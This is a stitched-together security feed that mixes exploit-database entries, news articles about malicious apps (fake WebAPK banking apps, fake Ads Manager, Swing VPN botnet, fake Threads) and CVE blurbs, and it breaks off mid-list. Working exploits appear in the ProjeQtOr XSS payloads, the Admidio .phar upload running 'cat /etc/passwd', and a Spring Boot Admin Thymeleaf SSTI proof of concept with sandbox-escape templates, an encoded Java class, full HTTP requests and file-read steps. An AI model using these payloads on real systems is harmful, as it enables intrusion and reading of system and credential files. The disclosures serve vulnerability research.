ProjeQtOr Project Management System version 10.4.1 suffers from multiple cross site scripting vulnerabilities.

    Exploit Title: ProjeQtOr Project Management System V10.4.1 - Multiple XSSVersion: V10.4.1Bugs:  Multiple XSSTechnology: PHPVendor URL: https://www.projeqtor.orgSoftware Link: https://sourceforge.net/projects/projectorria/files/projeqtorV10.4.1.zip/downloadDate of found: 09.07.2023Author: Mirabbas AğalarovTested on: Linux 2. Technical Details & POC                                     ### XSS-1 ### visit: http://localhost/projeqtor/view/refreshCronIconStatus.php?cronStatus=miri%27);%22%3E%3Cscript%3Ealert(4)%3C/script%3E&csrfToken=payload: miri%27);%22%3E%3Cscript%3Ealert(4)%3C/script%3E                                    ### XSS-2 ###steps: 1. login to account2. go projects and create project3.add attachment3. upload svg file"""<?xml version="1.0" standalone="no"?><!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd"><svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">   <polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>   <script type="text/javascript">      alert(document.location);   </script></svg>"""4. Go to  svg file ( http://localhost/projeqtor/files/attach/attachment_5/malas.svg )                                       ### XSS-3 ###Go to below adress (post request)POST /projeqtor/tool/ack.php?destinationWidth=50&destinationHeight=0&isIE=&xhrPostDestination=resultDivMain&xhrPostIsResultMessage=true&xhrPostValidationType=attachment&xhrPostTimestamp=1688898776311&csrfToken= HTTP/1.1Host: localhostContent-Length: 35sec-ch-ua: Content-Type: application/x-www-form-urlencodedX-Requested-With: XMLHttpRequestsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.134 Safari/537.36sec-ch-ua-platform: ""Accept: */*Origin: http://localhostSec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: http://localhost/projeqtor/view/main.phpAccept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=r5cjcsggl4j0oa9s70vchaklf3Connection: closeresultAck=<script>alert(4)</script>

ProjeQtOr Project Management System 10.4.1 Cross Site Scripting

Admidio version 4.2.10 suffers from a remote code execution vulnerability.

    Exploit Title: Admidio v4.2.10 - Remote Code Execution (RCE)Application: AdmidioVersion: 4.2.10Bugs:  RCETechnology: PHPVendor URL: https://www.admidio.org/Software Link: https://www.admidio.org/download.phpDate of found: 10.07.2023Author: Mirabbas AğalarovTested on: Linux2. Technical Details & POC========================================Steps:1. Login to account2. Go to Announcements3. Add Entry4. Upload .phar file in image upload section..phar file Content<?php echo system('cat /etc/passwd');?>5. Visit .phar file  ( http://localhost/admidio/adm_my_files/announcements/images/20230710-172217_430o3e5ma5dnuvhp.phar )Request:POST /admidio/adm_program/system/ckeditor_upload_handler.php?CKEditor=ann_description&CKEditorFuncNum=1&langCode=en HTTP/1.1Host: localhostContent-Length: 378Cache-Control: max-age=0sec-ch-ua: sec-ch-ua-mobile: ?0sec-ch-ua-platform: ""Upgrade-Insecure-Requests: 1Origin: http://localhostContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryne9TRuC1tAqhR86rUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.134 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: same-originSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: iframeReferer: http://localhost/admidio/adm_program/modules/announcements/announcements_new.php?headline=AnnouncementsAccept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9Cookie: ADMIDIO_admidio_adm_cookieconsent_status=dismiss; ADMIDIO_admidio_adm_SESSION_ID=penqrouatvh0vmp8v2mdntrgdn; ckCsrfToken=o3th5RcghWxx2qar157Xx4Y1f7FQ42ayQ9TaV8MBConnection: close------WebKitFormBoundaryne9TRuC1tAqhR86rContent-Disposition: form-data; name="upload"; filename="shell.phar"Content-Type: application/octet-stream<?php echo system('cat /etc/passwd');?>------WebKitFormBoundaryne9TRuC1tAqhR86rContent-Disposition: form-data; name="ckCsrfToken"o3th5RcghWxx2qar157Xx4Y1f7FQ42ayQ9TaV8MB------WebKitFormBoundaryne9TRuC1tAqhR86r--

Admidio 4.2.10 Remote Code Execution

Threat actors are taking advantage of Android's WebAPK technology to trick unsuspecting users into installing malicious web apps on Android phones that are designed to capture sensitive personal information.
"The attack began with victims receiving SMS messages suggesting the need to update a mobile banking application," researchers from CSIRT KNF said in an analysis released last week. "The

Mobile Security / Malware

Threat actors are taking advantage of Android's WebAPK technology to trick unsuspecting users into installing malicious web apps on Android phones that are designed to capture sensitive personal information.

"The attack began with victims receiving SMS messages suggesting the need to update a mobile banking application," researchers from CSIRT KNF said in an analysis released last week. "The link contained in the message led to a site that used WebAPK technology to install a malicious application on the victim's device."

The application impersonates PKO Bank Polski, a multinational banking and financial services company headquartered in Warsaw. Details of the campaign were first shared by Polish cybersecurity firm RIFFSEC.

WebAPK allows users to install progressive web apps (PWAs) to their home screen on Android devices without having to use the Google Play Store.

"When a user installs a PWA from Google Chrome and a WebAPK is used, the minting server "mints" (packages) and signs an APK for the PWA," Google explains in its documentation.

"That process takes time, but when the APK is ready, the browser installs that app silently on the user's device. Because trusted providers (Play Services or Samsung) signed the APK, the phone installs it without disabling security, as with any app coming from the store. There is no need for sideloading the app."

Once installed, the fake banking app ("org.chromium.webapk.a798467883c056fed\_v2") urges users to enter their credentials and two-factor authentication (2FA) tokens, effectively resulting in their theft.

"One of the challenges in countering such attacks is the fact that WebAPK applications generate different package names and checksums on each device," CSIRT KNF said. "They are dynamically built by the Chrome engine, which makes the use of this data as Indicators of Compromise (IoC) difficult."

UPCOMING WEBINAR

Shield Against Insider Threats: Master SaaS Security Posture Management

Worried about insider threats? We've got you covered! Join this webinar to explore practical strategies and the secrets of proactive security with SaaS Security Posture Management.

Join Today

To counter such threats, it's recommended to block websites that use the WebAPK mechanism to carry out phishing attacks.

The development comes as Resecurity revealed that cybercriminals are increasingly leveraging specialized device spoofing tools for Android that are marketed on the dark web in a bid to impersonate compromised account holders and bypass anti-fraud controls.

The antidetect tools, including Enclave Service and MacFly, are capable of spoofing mobile device fingerprints and other software and network parameters that are analyzed by anti-fraud systems, with threat actors also leveraging weak fraud controls to conduct unauthorized transactions via smartphones using banking malware such as TimpDoor and Clientor.

"Cybercriminals use these tools to access compromised accounts and impersonate legitimate customers by exploiting stolen cookie files, impersonating hyper-granular device identifiers, and utilizing fraud victims' unique network settings," the cybersecurity company said.

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

Hackers Exploit WebAPK to Deceive Android Users into Installing Malicious Apps

By Deeba Ahmed
The attack's perpetrators are Vietnamese, as confirmed by Malwarebytes.
This is a post from HackRead.com Read the original post: Fake Ads Manager Software and Malicious Extensions Target Facebook Accounts

Currently, the campaign has affected approximately 800 individuals and businesses globally, including 310 in the United States, with an ad budget compromise of $180,000.

Facebook serves as a thriving platform for optimizing ad campaigns, making it a crucial tool for businesses worldwide to boost their revenues. However, it is not without its downsides, as the platform has been exploited by cybercriminals to spread malware and, **even worse, ransomware**.

A recent warning issued by Malwarebytes’ senior threat researcher, Jérôme Segura, highlights the need for businesses to be vigilant. He cautions against falling victim to malicious Meta ad manager downloaders and Chrome extensions, particularly when faced with offers that seem too good to be true and involve clicking on suspicious URLs. The primary targets of these attacks are often business account users who are willing to invest their ad dollars in Meta platforms.

**Vietnamese Hackers Targeting Businesses’ Advertising Accounts**

According to Malwarebyte’s latest blog post, a newly identified cybercrime gang originating from Vietnam has been engaging in targeted attacks on **Facebook business users**, with the aim of stealing advertising accounts. What makes this situation even more alarming is that victims are not limited to a specific geographic region; the attacks have been reported worldwide.

Jérôme Segura, in his **analysis**, reported a noticeable surge in sponsored posts and accounts that are attempting to impersonate Meta/Facebook Ad Manager in recent weeks. Delving deeper into the matter, investigators uncovered that the cybercriminals are distributing counterfeit software, falsely promoting it as a more effective tool for optimizing ads on Facebook. Businesses and advertisers need to be aware of this emerging threat to safeguard their accounts and assets.

The cybercrime gang employs malware-infected Chrome extensions as their method of choice to steal Facebook business account credentials. What is particularly intriguing is that Jérôme Segura was able to detect their campaign thanks to a mistake made by the threat actors themselves.

Apparently, the attackers accidentally placed one of the **malware files** in the wrong location, which ultimately led to the inadvertent exposure of stolen data. This fortunate error provided valuable insights to the researchers at Malwarebytes, aiding them in their investigation and analysis of the cybercrime operation.

**What Happens When Meta Business Accounts Get Infected with Malware?**

Once the malicious extension is downloaded, the attackers gain control over the business’s ad budget, allowing them to exploit it according to their own agenda. The campaign came to light in early June when the threat actors enticed businesses with deceptive Facebook Ads Manager program installers, distributed through URLs, promising to enhance ad revenues.

To make their scheme more convincing, the attackers utilized fraudulent accounts with thousands of followers. Consequently, the posts made through these accounts quickly went viral, further deceiving unsuspecting victims and expanding the impact of the attack.

The victims are redirected to phishing pages that imitate the appearance of Meta’s official logo and branding. Upon downloading the program file, several components of an MSI installer package are installed in the directory: C:\\Program Files (x86)\\Ads Manager\\Ads Manager. Subsequently, a batch script is initiated, opening a new browser window displaying a custom extension.

In this window, the unsuspecting victim is prompted to enter their Facebook credentials on a deceptive login page. It is through this fraudulent login page that the cybercriminals aim to harvest the victims’ login credentials, granting them unauthorized access to the victims’ Facebook business accounts.

The custom extension cleverly masquerades as an unpacked Google Translate extension, making it appear innocuous and legitimate. However, upon reverse engineering, it becomes evident that the extension’s code is entirely unrelated to its purported function. Instead, the sole purpose of this deceptive extension is to illicitly gather Facebook login credentials and cookies from unsuspecting users.

Image: Malwarebytes

To exfiltrate the stolen data, the cybercriminals employ a cunning technique of bypassing Content Security Policy (CSP) restrictions by leveraging **Google Analytics**. This allows them to transmit the stolen information undetected and without triggering any alarms. In effect, the attackers exploit the widely-used Google Analytics service as a conduit to sneak the stolen data out of the victim’s system and into their own malicious infrastructure.

This sophisticated method allows the cybercrime gang to continue their **illicit activities** discreetly, evading detection while compromising the security and privacy of Facebook business account users.

Just for your information, Facebook Ad Manager is a tool that enables users to run online ads on various social media platforms owned by Meta, including Instagram. Recently, cybersecurity researchers detected approximately 20 malicious ad manager archives, which were used to distribute Chrome extensions with the intention of hijacking Facebook business accounts.

During their investigation, researchers stumbled upon a newly discovered phishing site and found an unexpected mistake made by the cybercriminals. The attackers had failed to include the payload but inadvertently leaked the stolen data.

Recognizing their error, the criminals promptly removed the file from their **Google Drive account** and then updated the download link on the phishing site with a new file hosted on MediaFire. This move was likely an attempt to cover their tracks and maintain their malicious activities undetected.

Upon further analysis, researchers identified column titles in the Vietnamese language within the stolen data, which were directly related to ad budgets and currencies. This points to the origin of the cybercrime gang or indicates that they might be targeting victims from **Vietnamese-speaking regions**.

As of now, the campaign has victimized around 800 individuals and businesses, highlighting the severity of the threat and the importance of staying vigilant against such phishing attacks and malware distribution schemes. What’s worse, the threat actors managed to compromise over $180,000 in ad budget including from 300 victims within the United States.

Targeted regions – Image: Malwarebytes

In previous research, Meta disclosed that **threat actors like DuckTail**, among others, have been targeting Facebook advertising accounts over an extended period. While Jérôme Segura acknowledges the uncertainty regarding the direct attribution of this threat actor to DuckTail, he highlights the undeniable similarities in motives and a shared preference for hacking Facebook business accounts, which raises the possibility of a connection.

In response to the campaign’s discovery, Facebook has been duly notified, and the company has taken prompt action. To protect themselves, users of Facebook business manager accounts are advised to immediately revoke access for any unidentified users and conduct a thorough scan of their computers to identify and remove any potential malware that might have been installed. Taking these precautionary measures will help safeguard their accounts and data from falling victim to these malicious attacks.

1.  **Mandrake Android malware stealing Facebook data since 2016**
2.  **Facebook ads dropped malware posing as a Clubhouse PC app**
3.  **CopperStealer malware steals Facebook and Google passwords**
4.  **Facebook removes 100s of accounts for iOS and Android malware**

Fake Ads Manager Software and Malicious Extensions Target Facebook Accounts

By Waqas
The developer behind the malicious app, Limestone Software Solutions, has also been banned from the Google Play Store.
This is a post from HackRead.com Read the original post: Google Removes Swing VPN Android App Exposed as DDoS Botnet

The app under discussion, Swing VPN – Fast VPN Proxy, was uncovered as a DDoS botnet by a cybersecurity researcher named “Lecromee” on June 4th, 2023.

On June 4th, 2023, cybersecurity researcher “Lecromee” uncovered alarming information about the popular VPN app, Swing VPN – Fast VPN Proxy. Developed by Limestone Software Solutions for Android and iOS platforms, Swing VPN’s Android version was found to be operating as a dangerous **DDoS botnet**, posing significant risks to its unsuspecting users.

Hackread.com, first **reported on the issue** on June 21, 2023, after Lecromee’s investigation raised serious concerns. The findings indicated that the app, which claimed to offer legitimate VPN services, was harbouring malicious intent and could carry out distributed denial of service (DDoS) attacks.

Shortly after the report was published, Hackread.com was contacted by Google on June 22, confirming the veracity of the claims. In response to the alarming discovery, Google took immediate action and swiftly removed Swing VPN’s Android app with over 5 million installs from the **Google Play Store**.

It is worth noting that another app from Limestone Software Solutions, called **Hotspot for Swing VPN**, has also been removed from the app store along with Swing VPN – Fast VPN Proxy.

A Google spokesperson emphasized the company’s commitment to user safety and security, stating,

> “The app was removed from Google Play on June 22, and the developer has been banned. Users are also protected by Google Play Protect, which warns users of apps known to exhibit malicious behaviour on Android devices with Google Play Services, even when those apps come from other sources.”
> 
> Google

The removal of **Swing VPN – Fast VPN Proxy** app from the official app store highlights the ongoing challenges faced by platforms like Google Play in combating malicious apps. Unfortunately, such occurrences are not uncommon, and Google continuously works to enhance its security measures to protect users.

However, users themselves must remain vigilant and cautious about the apps they download and grant permission to. Cybersecurity experts recommend the following best practices to stay safe:

*   **Research Before Download**: Always research the app and its developer before downloading it. Check user reviews, ratings, and previous security incidents, if any.
*   **Update Regularly**: Keep all apps, including VPNs, up-to-date with the latest versions and security patches to minimize vulnerabilities.
*   **Verify Permissions**: Be cautious about granting excessive permissions to apps. Review and understand the permissions an app requests before installation.
*   **Use Reputable Sources**: Stick to trusted app stores like Google Play and Apple’s App Store to minimize the risk of downloading malicious apps.
*   **Antivirus Software**: Install reputable antivirus software on your device to detect and block potential threats.

As the digital landscape continues to evolve, staying informed and vigilant against cyber threats is crucial. The Swing VPN incident serves as a reminder that even seemingly legitimate apps can harbour dangerous intentions, making it essential for users to prioritize their online safety.

If you suspect any app or service is engaging in malicious behaviour, report it to the respective app store or platform immediately. By working together, users, researchers, and tech companies can create a safer digital environment for everyone.

If you are an Android user, you can follow this **link** to report an app or an app developer. For iOS users, this **link** can be helpful.

1.  Fake GitHub Repos Delivering Malware as PoCs
2.  Google kicks out 600 malicious apps from Play Store
3.  Apple removed all major VPN apps from Chinese App Store
4.  Google removes ClearURLs Chrome extension from its store
5.  Google Fails To Remove “App Developer” Behind Malware Scam

I am a UK-based cybersecurity journalist with a passion for covering the latest happenings in cyber security and tech world. I am also into gaming, reading and investigative journalism

Google Removes Swing VPN Android App Exposed as DDoS Botnet

Microsoft Edge (Chromium-based) Remote Code Execution Vulnerability

CVE-2023-36887

Microsoft Edge for Android (Chromium-based) Tampering Vulnerability

CVE-2023-36888

Thymeleaf through 3.1.1.RELEASE, as used in spring-boot-admin (aka Spring Boot Admin) through 3.1.1 and other products, allows sandbox bypass via crafted HTML. This may be relevant for SSTI (Server Side Template Injection) and code execution in spring-boot-admin if MailNotifier is enabled and there is write access to environment variables via the UI.

**Impact**

All users who run Spring Boot Admin Server, having enabled MailNotifier and write access to environment variables via UI are possibly affected.

The vulnerability affects the product and version range：

    # 2023-07-05
    spring-boot-admin <= 3.1.0
    thymeleaf <= 3.1.1.RELEASE
    

**RCE POC**

all the proof environment is provided from this github repository.

when you started the springboot-admin environment,then you can follow the steps as below to getshell:

first, write a html named poc3.html:

<!DOCTYPE html\>
<html xmlns:th\="http://www.thymeleaf.org"\>
<head\>
    <meta http-equiv\="Content-Type" content\="text/html; charset=UTF-8"/>
</head\>
<body\>

<tr
        th:with\="getRuntimeMethod=${T(org.springframework.util.ReflectionUtils).findMethod(T(org.springframework.util.ClassUtils).forName('java.lang.Runtime',T(org.springframework.util.ClassUtils).getDefaultClassLoader()), 'getRuntime' )}"
\>
    <td\>
        <a
                th:with\="runtimeObj=${T(org.springframework.util.ReflectionUtils).invokeMethod(getRuntimeMethod, null)}"
        \>
            <a
                    th:with\="exeMethod=${T(org.springframework.util.ReflectionUtils).findMethod(T(org.springframework.util.ClassUtils).forName('java.lang.Runtime',T(org.springframework.util.ClassUtils).getDefaultClassLoader()), 'exec', ''.getClass() )}"
            \>
                <a
                        th:with\="param2=${T(org.springframework.util.ReflectionUtils).invokeMethod(exeMethod, runtimeObj, 'calc' )
                }"
                        th:href\="${param2}"
                \></a\>
            </a\>

        </a\>
    </td\>
</tr\>

</body\>
</html\>

then put the poc3.html into your VPS,and start a HTTPServer which the spring-boot-admin app can access.

and then send this HTTP package to enable MailNotifier:

    POST /actuator/env HTTP/1.1
    Host: 127.0.0.1:8080
    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5163.147 Safari/537.36
    Accept: application/json
    Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
    Accept-Encoding: gzip, deflate
    X-Requested-With: XMLHttpRequest
    X-SBA-REQUEST: true
    Connection: close
    Referer: http://127.0.0.1:8080/
    Sec-Fetch-Dest: empty
    Sec-Fetch-Mode: cors
    Sec-Fetch-Site: same-origin
    sec-ch-ua-platform: "macOS"
    sec-ch-ua: "Google Chrome";v="108", "Chromium";v="108", "Not=A?Brand";v="24"
    sec-ch-ua-mobile: ?0
    Content-Type: application/json
    Content-Length: 63
    
    {"name":"spring.boot.admin.notify.mail.enabled","value":"true"}
    

send this HTTP package to modify the email template, which is our malicious html file's address.

    POST /actuator/env HTTP/1.1
    Host: 127.0.0.1:8080
    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5163.147 Safari/537.36
    Accept: application/json
    Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
    Accept-Encoding: gzip, deflate
    X-Requested-With: XMLHttpRequest
    X-SBA-REQUEST: true
    Connection: close
    Referer: http://127.0.0.1:8080/
    Sec-Fetch-Dest: empty
    Sec-Fetch-Mode: cors
    Sec-Fetch-Site: same-origin
    sec-ch-ua-platform: "macOS"
    sec-ch-ua: "Google Chrome";v="108", "Chromium";v="108", "Not=A?Brand";v="24"
    sec-ch-ua-mobile: ?0
    Content-Type: application/json
    Content-Length: 91
    
    {"name":"spring.boot.admin.notify.mail.template","value":"http://127.0.0.1:4578/poc3.html"}
    

send this HTTP package to refresh the modify:

    POST /actuator/refresh HTTP/1.1
    Host: 127.0.0.1:8080
    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5163.147 Safari/537.36
    Accept: application/json
    Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
    Accept-Encoding: gzip, deflate
    X-Requested-With: XMLHttpRequest
    X-SBA-REQUEST: true
    Connection: close
    Referer: http://127.0.0.1:8080/
    Sec-Fetch-Dest: empty
    Sec-Fetch-Mode: cors
    Sec-Fetch-Site: same-origin
    sec-ch-ua-platform: "macOS"
    sec-ch-ua: "Google Chrome";v="108", "Chromium";v="108", "Not=A?Brand";v="24"
    sec-ch-ua-mobile: ?0
    Content-Type: application/json
    Content-Length: 2
    
    {}
    

finally,send this HTTP package to the spring-boot-admin app to trigger offline notification,and you will getshell immediately.

    POST /instances HTTP/1.1
    Accept: application/json
    Content-Type: application/json
    User-Agent: Java/17.0.6
    Host: 127.0.0.1:8080
    Content-Length: 178
    
    {"name":"test","managementUrl":"http://127.0.0.1:1","healthUrl":"http://127.0.0.1:1","serviceUrl":"http://127.0.0.1:1","metadata":{"startup":"2024-09-04T14:49:12.6694287+08:00"}}
    

**Arbitrary-file-read POC**

When you have configured mail notifications success,for example：

then you can configure the template attribute of MailNotifier to be a local file of the springboot-admin host or a file under the classpath of the springboot-admin app, and then modify the recipient of MailNotifier to be a malicious attacker. When an email notification is triggered, the malicious attacker will receive the corresponding template attribute files, resulting in arbitrary file reads.

if you modify the template attribute of MailNotifier to be a file under the classpath of the springboot-admin app, you even can get the application.properties file.

**Vulnerability analysis**

The reason for the vulnerability is that springboot-admin uses thymeleaf for HTML rendering, and thymeleaf has a sandbox bypass vulnerability. If thymeleaf renders a malicious HTML, RCE can be caused by using the thymeleaf sandbox to escape; at the same time, if the attacker can use the actuator to The template attribute of MailNotifier is changed to a remote html template, then springboot-admin will load malicious html from the attacker's server and use thymeleaf to render it, thus causing RCE; if the template attribute of MailNotifier is modified to the server's local file or classpath will cause arbitrary file reading;

The key positions of using thymeleaf to render HTML in springboot-admin are as follows:

If "this.template" is modified to a remote file, such as "http://xxx.xx/poc.html", then the html file will be loaded from the remote and rendered. With the sandbox escape vulnerability of thymeleaf, RCE can be performed;

The following are three thymeleaf sandbox escape pocs:

1.  This poc applies to versions prior to JDK9:

<!DOCTYPE html\>
<html xmlns:th\="http://www.thymeleaf.org"\>
<head\>
    <meta http-equiv\="Content-Type" content\="text/html; charset=UTF-8"/>
</head\>
<body\>

<tr
        th:with\="defineClassMethod=${T(org.springframework.util.ReflectionUtils).findMethod(T(org.springframework.util.ClassUtils).forName('org.springframework.cglib.core.ReflectUtils',T(org.springframework.util.ClassUtils).getDefaultClassLoader()), 'defineClass', ''.getClass() ,''.getBytes().getClass(), T(org.springframework.util.ClassUtils).forName('java.lang.ClassLoader',T(org.springframework.util.ClassUtils).getDefaultClassLoader()) )}"
\>
    <td\>
        <a
                th:with\="param2=${T(org.springframework.util.ReflectionUtils).invokeMethod(defineClassMethod, null,
                    'fun.pinger.Hack',
                    T(org.springframework.util.Base64Utils).decodeFromString('yv66vgAAADQAKgoACQAYCgAZABoIABsKABkAHAcAHQcAHgoABgAfBwAoBwAhAQAGPGluaXQ+AQADKClWAQAEQ29kZQEAD0xpbmVOdW1iZXJUYWJsZQEAEkxvY2FsVmFyaWFibGVUYWJsZQEABHRoaXMBAAZMSGFjazsBAAg8Y2xpbml0PgEAAWUBABVMamF2YS9pby9JT0V4Y2VwdGlvbjsBAA1TdGFja01hcFRhYmxlBwAdAQAKU291cmNlRmlsZQEACUhhY2suamF2YQwACgALBwAiDAAjACQBAARjYWxjDAAlACYBABNqYXZhL2lvL0lPRXhjZXB0aW9uAQAaamF2YS9sYW5nL1J1bnRpbWVFeGNlcHRpb24MAAoAJwEABEhhY2sBABBqYXZhL2xhbmcvT2JqZWN0AQARamF2YS9sYW5nL1J1bnRpbWUBAApnZXRSdW50aW1lAQAVKClMamF2YS9sYW5nL1J1bnRpbWU7AQAEZXhlYwEAJyhMamF2YS9sYW5nL1N0cmluZzspTGphdmEvbGFuZy9Qcm9jZXNzOwEAGChMamF2YS9sYW5nL1Rocm93YWJsZTspVgEAD2Z1bi9waW5nZXIvSGFjawEAEUxmdW4vcGluZ2VyL0hhY2s7ACEACAAJAAAAAAACAAEACgALAAEADAAAAC8AAQABAAAABSq3AAGxAAAAAgANAAAABgABAAAAAwAOAAAADAABAAAABQAPACkAAAAIABEACwABAAwAAABmAAMAAQAAABe4AAISA7YABFenAA1LuwAGWSq3AAe/sQABAAAACQAMAAUAAwANAAAAFgAFAAAABwAJAAoADAAIAA0ACQAWAAsADgAAAAwAAQANAAkAEgATAAAAFAAAAAcAAkwHABUJAAEAFgAAAAIAFw=='),
                    new org.springframework.core.OverridingClassLoader(T(org.springframework.util.ClassUtils).getDefaultClassLoader()) )
                }"
                th:href\="${param2}"
        \></a\>
    </td\>
</tr\>

</body\>
</html\>

2.  This POC applies to versions after JDK9:

<!DOCTYPE html\>
<html xmlns:th\="http://www.thymeleaf.org"\>
<head\>
    <meta http-equiv\="Content-Type" content\="text/html; charset=UTF-8"/>
</head\>
<body\>

<tr
        th:with\="createMethod=${T(org.springframework.util.ReflectionUtils).findMethod(T(org.springframework.util.ClassUtils).forName('jdk.jshell.JShell',T(org.springframework.util.ClassUtils).getDefaultClassLoader()), 'create' )}"
\>
    <td\>
        <a
                th:with\="shellObj=${T(org.springframework.util.ReflectionUtils).invokeMethod(createMethod, null)}"
        \>
            <a
                    th:with\="evalMethod=${T(org.springframework.util.ReflectionUtils).findMethod(T(org.springframework.util.ClassUtils).forName('jdk.jshell.JShell',T(org.springframework.util.ClassUtils).getDefaultClassLoader()), 'eval', ''.getClass() )}"
            \>
                <a
                        th:with\="param2=${T(org.springframework.util.ReflectionUtils).invokeMethod(evalMethod, shellObj,  new java.lang.String(T(org.springframework.util.Base64Utils).decodeFromString('amF2YS5sYW5nLlJ1bnRpbWUuZ2V0UnVudGltZSgpLmV4ZWMoImNhbGMiKQ==')))
                }"
                        th:href\="${param2}"
                \></a\>
            </a\>

        </a\>
    </td\>
</tr\>

</body\>
</html\>

3.  This POC is applicable to all versions of JDK:

<!DOCTYPE html\>
<html xmlns:th\="http://www.thymeleaf.org"\>
<head\>
    <meta http-equiv\="Content-Type" content\="text/html; charset=UTF-8"/>
</head\>
<body\>

<tr
        th:with\="getRuntimeMethod=${T(org.springframework.util.ReflectionUtils).findMethod(T(org.springframework.util.ClassUtils).forName('java.lang.Runtime',T(org.springframework.util.ClassUtils).getDefaultClassLoader()), 'getRuntime' )}"
\>
    <td\>
        <a
                th:with\="runtimeObj=${T(org.springframework.util.ReflectionUtils).invokeMethod(getRuntimeMethod, null)}"
        \>
            <a
                    th:with\="exeMethod=${T(org.springframework.util.ReflectionUtils).findMethod(T(org.springframework.util.ClassUtils).forName('java.lang.Runtime',T(org.springframework.util.ClassUtils).getDefaultClassLoader()), 'exec', ''.getClass() )}"
            \>
                <a
                        th:with\="param2=${T(org.springframework.util.ReflectionUtils).invokeMethod(exeMethod, runtimeObj, 'calc' )
                }"
                        th:href\="${param2}"
                \></a\>
            </a\>

        </a\>
    </td\>
</tr\>

</body\>
</html\>

**Workarounds**

*   Disable any MailNotifier
*   Disable write access (POST request) on /env actuator endpoint
*   Limit the template attribute of MailNotifier to a few specific options, and avoid using the http:// or file:/// protocol

CVE-2023-38286: GitHub - p1n93r/SpringBootAdmin-thymeleaf-SSTI: SpringBootAdmin-thymeleaf-SSTI which can cause RCE

By Habiba Rashid
Due to privacy concerns, Meta has not yet released the Threads app in EU countries, creating a loophole for criminals to upload fake versions of the app.
This is a post from HackRead.com Read the original post: Fake THREADS App Climbs to Number 1 Spot on Apple Store in Europe

**Apple has removed the fake THREADS app from the European App Store, ending its top position as the number 1 iOS app until July 11, 2023, when it was reported.**

In a recent development, Apple has **taken down** a fake version of the popular Threads app from its App Store in Europe. The fake app, developed by SocialKit LTD, had been soaring up the charts of the most downloaded apps. However, thanks to the diligent work of cybersecurity firm and iOS developer **Mysk**, the fraudulent app has been exposed and removed, and the developer’s account has been suspended.

Among the apps created by SocialKit LTD that have been removed are ChatGP, SelfMe: Selfie AI Face Editor, and Remove Background Eraser, among others. The fakeThreads app had gained significant traction, particularly in Germany, the Netherlands, and Switzerland, where it had claimed the number one position in the App Store rankings.

Fake app topping in EU countries (Screenshots via Mysk – Twitter)

The original Threads app, launched by Meta as a competitor to Twitter, has garnered more than 100 million downloads worldwide since its release earlier this month. However, the app has yet to be made available in the European Union due to the bloc’s stringent privacy laws.

This absence has created an opportunity for cybercriminals to capitalize on the demand by producing counterfeit apps and employing over 700 phoney domain names in a single day, according to a **report**.

Mysk, in a tweet, highlighted the concerning statistics regarding the genuine app’s absence in the European market. They stated, “Statistically, exactly 0% of iOS users looking for Threads in the EU have downloaded the right app. If app sideloading was possible, the percentage of EU users downloading the right app would certainly be greater than 0%.”

Cybersecurity analyst Veriti warns users, especially those in Europe, to exercise caution when downloading knock-off versions of Threads, as they often serve as conduits for malware or phishing attacks. It is crucial to obtain the app from trusted sources and exercise due diligence at all times.

While the fraudulent Threads app has been removed from the European App Store, similar bogus apps have also been detected on other platforms. Before the official launch of Instagram’s Threads on July 6, several impersonating apps were circulating on the Google Play Store, prompting Google to eventually remove them.

Nevertheless, ChatGPT’s official app for iPhone has **already been released**, while its Android app could soon be available on the Google Play Store.

**RELATED ARTICLES**

1.  Google Deletes Fake BatteryBot Pro Malware App
2.  Scylla Ad Fraud Attack on iOS Users Halted by Apple
3.  Apple removes Clearview AI iPhone app from App Store
4.  Apple removes anti-virus apps from store for “stealing data”
5.  Google removes ClearURLs Chrome extension from app store

I’m a student and cybersecurity writer. On a random Sunday, I am likely to be figuring out life and reading Kafka.

Fake THREADS App Climbs to Number 1 Spot on Apple Store in Europe

A cross-site scripting (XSS) vulnerability in Maid Hiring Management System v1.0 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Page Description of the /admin/aboutus.php component.

**Maid Hiring Management System using PHP and MySQL**

The aim of ‘Maid Hiring Management System in PHP ’ is to automate its existing manual system by the help of computerized equipment and full-fledge computer software, fulfilling their requirements so that their valuable date can be stored for a longer period with easy accessing and manipulation of the same. Basically the project describes how to handle good performance and provide better services to clients. This project can lead to error free, secure, reliable and fast management system. This system will help the organization in better utilization of resources.

**Project Requirements**

Project Name

Maid Hiring Management System Project in PHP

Language Used

PHP5.6, PHP7.x

Database

MySQL 5.x

User Interface Design

HTML, AJAX,JQUERY,JAVASCRIPT

Web Browser

Mozilla, Google Chrome, IE8, OPERA

Software

XAMPP / Wamp / Mamp/ Lamp (anyone)

**Project Modules**

